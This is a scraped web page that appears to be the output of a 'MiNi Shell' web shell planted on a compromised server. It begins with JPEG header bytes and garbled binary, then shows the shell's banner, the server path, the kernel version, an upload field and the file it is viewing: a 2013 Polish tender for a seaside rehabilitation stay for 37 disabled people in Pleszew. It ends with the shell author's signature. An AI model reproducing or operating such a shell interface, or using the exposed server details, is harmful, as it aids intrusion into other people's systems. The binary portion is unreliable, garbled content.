JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130723/289414-N-2013.html

<p class="kh_header"><b>Pleszew: Zorganizowanie turnusu  rehabilitacyjnego dla  37 osób niepełnosprawnych i  ich  opiekunów.</b><br>
<b>Numer ogłoszenia: 289414 - 2013; data zamieszczenia: 23.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kazimierza Wielkiego 7A, 63-300 Pleszew, woj. wielkopolskie, tel. 0-62 7420161, faks 0-62 7420161.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie turnusu  rehabilitacyjnego dla  37 osób niepełnosprawnych i  ich  opiekunów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest usługa zorganizowania i przeprowadzenia 14 - dniowego turnusu rehabilitacyjnego dla 37 osób niepełnosprawnych wraz z 4 opiekunami w miejscowości położonej nad polskim morzem (ośrodek zlokalizowany nie dalej niż 1500 m od brzegu morza).2. Charakterystyka grupy: 37 osób niepełnosprawnych z następującymi schorzeniami i dysfunkcjami oraz 4 opiekunów: - upośledzenie umysłowe w stopniu lekkim (01-U); - zaburzenia  
słuchu (03-L); - upośledzenie narządu ruchu (05-R); - choroby układu oddechowego i krążenia (07-S); - choroby układu pokarmowego (08-T); - choroby układu moczowo - płciowego (09-M);- choroby neurologiczne (10-N); - inne, w tym schorzenia endokrynologiczne, metaboliczne,- zaburzenia enzymatyczne, choroby układu krwiotwórczego (11-i). W grupie nie będzie osób na wózkach inwalidzkich. 3. Turnusy muszą być przeprowadzone zgodnie z przepisami ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011r. Nr 127 , poz.721 z późn.zm.) oraz rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych ( Dz.U. z 2007 r. Nr 230 , poz.1694 z pózn. zm). 4. Turnusy muszą być realizowane zgodnie z opracowanym i złożonym u właściwego wojewody programem turnusu. 5. Ośrodek, w którym będą odbywały się turnusy rehabilitacyjne musi posiadać aktualny wpis do rejestru ośrodków 
prowadzony przez wojewodę, w których mogą odbywać się turnusy rehabilitacyjne dla zorganizowanych grup turnusowych osób następującymi schorzeniami: -upośledzenie umysłowe w stopniu lekkim;- zaburzenia słuchu;-upośledzenie narządu ruchu; -choroby układu oddechowego i krążenia; -choroby układu pokarmowego;- choroby układu moczowo - płciowego; -choroby neurologiczne; -inne, w tym schorzenia endokrynologiczne, metaboliczne, zaburzenia enzymatyczne, choroby układu krwiotwórczego. 7. Wykonawca zapewni transport z miejsca zamieszkania osób niepełnosprawnych ( zbiórka: siedziba PCPR w Pleszewie, ul. K. Wielkiego 7A) do ośrodka i z powrotem (autokar z klimatyzacją, rozkładane fotele).
8. Ośrodek musi być wyposażony w minimum: basen kryty, gabinety masażu, fizykoterapii, hydroterapii, inhalacje, kawiarnię. 9. W ramach organizowanych turnusów wykonawca musi zapewnić minimum: a). 3  zabiegi rehabilitacyjne dziennie (w dni powszednie) dla każdej osoby niepełnosprawnej, według wskazań lekarza, odpowiednio do rodzaju schorzeń i dysfunkcji; b). 2 zabiegi rehabilitacyjne dziennie  -  w dni powszednie dla każdego z opiekunów; c). całodobową opiekę medyczną (lekarską i pielęgniarską) oraz ratowniczą na basenie; d). kadrę gwarantującą prawidłową realizację programu turnusów, w tym opiekunów grup,odpowiedzialnych za koordynację pobytu grup na turnusach; e). badania lekarskie na początku i końcu turnusów; f). pełne wyżywienie (od obiadu w dniu przyjazdu do śniadania w dniu wyjazdu) tj.urozmaicone 4 posiłki dziennie w klimatyzowanej stołówce na terenie ośrodka - posiłki serwowane do stolika lub szwedzki stół (śniadanie, obiad dwudaniowy, podwieczorek, kolacja), suchy prowiant na wycieczki. W dniu powrotu wykonawca zapewni uczestnikom prowiant w związku z podróżą; g). w przypadku osób z zalecaną dietą wykonawca zapewnieni odpowiednie posiłki dostosowane do diety uczestników; h). organizator zapewni uczestnikom bezpłatne zajęcia o charakterze integracyjno - rozrywkowym, w tym: - minimum 1 wycieczkę autokarową w miejsce atrakcyjne turystycznie; - minimum co drugi dzień zajęcia o charakterze rozrywkowym, w tym: minimum 2 animacje tematyczne wraz z poczęstunkiem odpowiednim do typu imprezy, minimum 2 ogniska integracyjne / grillowanie z pieczeniem kiełbasek, minimum 2 spacery / pikniki nad brzegiem morza; i). Wykonawca zobowiązany będzie w ramach turnusu pokryć wszystkie koszty ewentualnych biletów wstępu, transportu, a w przypadku wyjazdów całodniowych wykonawca zapewni jeden gorący posiłek i suchy prowiant). 10. W cenę turnusów należy wliczyć ewentualną opłatę klimatyczną za uczestników turnusu oraz ich opiekunów, jeżeli będzie tego wymagać lokalizacja ośrodka.11. Organizator zapewni zakwaterowanie w pokojach z pełnym węzłem sanitarnym, wyposażonych w TV, telefon, ręczniki oraz czajnik bezprzewodowy, dostosowane do osób niepełnosprawnych. Struktura pokoi przedstawia się w sposób następujący: 20 pokoi 2 osobowych;1 pokój 1 osobowy. W grupie będzie 21 kobiet, 17 mężczyzn oraz 4 kobiety będące opiekunami osób niepełnosprawnych. 12. Wykonawca zapewni ponadto, 1 nocleg wraz z  
wyżywieniem (1 pokój 2 osobowy oraz 1 pokój 1 osobowy; obiadokolacja oraz śniadanie w dniu następnym), dla 2 osób - pracowników PCPR w Pleszewie, skierowanych do kontroli prawidłowości  realizacji niniejszej umowy oraz 1 kierowcy. 13. Organizator ponosi pełną odpowiedzialność za właściwą realizację usług związanych z przebiegiem turnusu rehabilitacyjnego, w tym zabiegi rehabilitacyjne, opiekę medyczną oraz imprezy integracyjne. 14.Organizator będzie zobowiązany przekazywać PCPR w Pleszewie informacje o przebiegu turnusów, o której mowa w art. 10 c ust.7 pkt.4 ustawy o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych z dnia 27 sierpnia 1997r (tj. (Dz.U. z 2011 r. Nr 127 ,poz.721 z późn.zm.).15. Wykonawca będzie zobowiązany do oznakowania miejsc, z których korzystać będą uczestnicy turnusów poprzez umieszczenie plakatów informacyjnych dotyczących projektu, które otrzyma od zamawiającego po podpisaniu umowy.16. Wykonawca przeprowadzi anonimową   ankietę oceny turnusu przez uczestników. 17. Wraz z rozliczeniem turnusu, Wykonawca przedłoży Zamawiającemu analizę badania opinii uczestników turnusu (ankiety oraz zestawienie zbiorcze, dokonane na podstawie ankiet oceniających turnus) oraz  dokumentację fotograficzną w formie papierowej (zdjęcia) oraz elektronicznej - płyta CD.18. Zamawiający zapewnia ubezpieczenie NNW uczestników turnusów rehabilitacyjnych na czas ich pobytu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Organizator turnusu musi posiadać:
1.Aktualny wpis do rejestru organizatorów turnusów rehabilitacyjnych, w których uczestniczą osoby niepełnosprawne korzystające z dofinansowania, określony w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych ( Dz. U z 2007r Nr, 230 poz, 1694), obejmujący następujące  niepełnosprawności: - upośledzenie umysłowe w stopniu lekkim (01-U);zaburzenia słuchu (03-L);upośledzenie narządu ruchu (05-R); choroby układu oddechowego i krążenia (07-S); choroby układu pokarmowego (08-T);choroby układu moczowo - płciowego (09-M); choroby neurologiczne (10-N); inne, w tym schorzenia endokrynologiczne, metaboliczne, zaburzenia enzymatyczne, choroby układu krwiotwórczego (11-i). 2. Aktualny wpis ośrodka Wykonawcy do rejestru ośrodków prowadzonego przez wojewodę, określony w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz.U. z 2007 nr 230, poz. 1694).
Zamawiający dokona oceny spełnienia w.w warunku na podstawie dokumentów załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentacji - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w następujących okolicznościach: 1). Zmiany ogólne:-zmiana adresu / siedziby wykonawcy; - zmiana osób występujących po stronie zamawiającego/wykonawcy. Nie jest dopuszczalna zmiana wykonawcy, z wyjątkiem sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych zgodnie z ksh, sukcesji z mocy prawa. 2). Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 3). Umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników turnusu rehabilitacyjnego z przyczyn niezależnych od Zamawiającego i będącego wynikiem: a) rezygnacji kandydata z udziału w turnusie rehabilitacyjnym pomimo wcześniejszych deklaracji o uczestnictwie,b) niestawienia się kandydata na turnus rehabilitacyjny pomimo wezwania Powiatowego Centrum Pomocy Rodzinie  w Pleszewie, c). przerwania uczestnictwa w turnusie (choroba, rezygnacja z uczestnictwa), którego nie można było przewidzieć w dniu zawarcia umowy, d) stwierdzenia niezdolności do uczestnictwa w turnusie przez lekarza medycyny. W powyższych przypadkach w umowie zmianie ulega przeliczenie kosztu turnusu. 4). Niezależnych od stron umowy zmian dotyczących osób kluczowych dla realizacji umowy (choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-pleszew.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Pleszewie, ul. K. Wielkiego 7A, 63-300 Pleszew
cena: bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 14:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Pleszewie, ul. K. Wielkiego 7A, 
63-300 Pleszew, (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt systemowy pn. Razem łatwiej - program aktywizacji zawodowej i społecznej w Powiecie Pleszewskim realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com